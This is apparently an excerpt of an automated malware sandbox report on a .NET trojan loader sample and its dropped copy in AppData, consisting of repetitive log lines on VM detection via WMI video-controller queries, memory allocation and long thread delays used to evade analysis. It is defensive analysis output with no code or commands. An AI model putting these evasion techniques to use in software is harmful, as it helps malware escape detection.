                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 4550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 7970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 9E30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: AE30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 15D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: 4F70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 8D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 9D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 9F80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: AF80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 1340000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 31E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory allocated: 2F50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239874Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239764Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239654Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239546Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239437Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239328Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239218Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239080Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238968Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238859Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238750Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238640Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238531Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238421Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238312Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238203Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238093Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237984Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237765Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237656Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237546Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237436Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237328Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237218Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237088Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236968Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236817Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236568Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236453Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236302Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236186Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236065Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 235943Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 235812Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239715Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239264Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237295Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWindow / User API: threadDelayed 2706Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWindow / User API: threadDelayed 3563Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9086Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 353Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7372Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWindow / User API: threadDelayed 7297Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWindow / User API: threadDelayed 2510Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeWindow / User API: threadDelayed 1786Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeWindow / User API: threadDelayed 3561Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239764s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239654s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -239080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238968s >= -30000sJump to behavior
